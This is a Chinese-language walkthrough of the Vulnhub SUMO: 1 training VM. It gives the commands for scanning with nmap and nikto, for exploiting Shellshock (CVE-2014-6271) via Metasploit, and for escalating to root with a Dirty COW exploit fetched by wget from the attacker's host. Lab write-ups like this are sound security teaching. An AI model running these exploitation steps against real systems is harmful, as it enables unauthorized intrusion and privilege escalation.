Vulnhub-SUMO: 1

  • A+
所属分类:安全文章

大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的知识。


靶机描述:


Target Address:http://www.vulnhub.com/entry/sumo-1,480/

Difficulty: Beginner(新手)

Goal: Get the root shell i.e.([email protected]:~#) and then obtain flag under /root).

Operating System: Linux


扫描靶机ip为192.168.86.152

arp-scan -l

Vulnhub-SUMO: 1


版本侦测和查看开放端口

nmap -sV -p- 192.168.86.152

Vulnhub-SUMO: 1


进入浏览器访问80端口,提示此为服务器默认页面

http://192.168.86.152:80

Vulnhub-SUMO: 1


执行nikto命令,OSVDB-112004似乎存在漏洞

nikto -h http://192.168.86.152

Vulnhub-SUMO: 1


用浏览器查看提示页面,找出漏洞id名CVE-2014-6271

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)

Vulnhub-SUMO: 1


使用msfconsole,搜索攻击方式

msfconsolesearch CVE-2014-6271


Vulnhub-SUMO: 1


选择攻击方式,进行攻击设置

use exploit/multi/http/apache_mod_cgi_bash_env_execset rhosts 192.168.86.152set targeturi /cgi-bin/testrun

Vulnhub-SUMO: 1


反弹shell,变为交互式tty,查看文件属性

shellpython -c'import pty;pty.spawn('/bin/bash')'

Vulnhub-SUMO: 1


使用脏牛提权,而脏牛提权漏洞影响>=2.4.22版本,执行命令查看内核版本

Vulnhub-SUMO: 1


下载脏牛漏洞脚本,文件名为dirtycowscan.sh

https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh


kali开启http服务

python -m SimpleHTTPServer 8000 

Vulnhub-SUMO: 1


远程访问kali并下载脚本文件,扫描并发现存在脏牛漏洞

Vulnhub-SUMO: 1


把链接中的代码在kali中编辑成.c的格式

https://www.exploit-db.com/raw/40839


在shell中下载dirty.c的文件,修改文件权限,进行编译(方法在脚本的注释行中)

wget http://192.168.86.138:8000/dirty.cchmod 777gcc -pthread dirty.c -o dirty -lcrypt

Vulnhub-SUMO: 1


运行脚本输入密码的地方可以随意设置

./dirty testpasswd

Vulnhub-SUMO: 1


使用firefart用户登录,使用刚刚设置的密码,获得root权限,拿到flag

Vulnhub-SUMO: 1


本文始发于微信公众号(亿人安全):Vulnhub-SUMO: 1

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: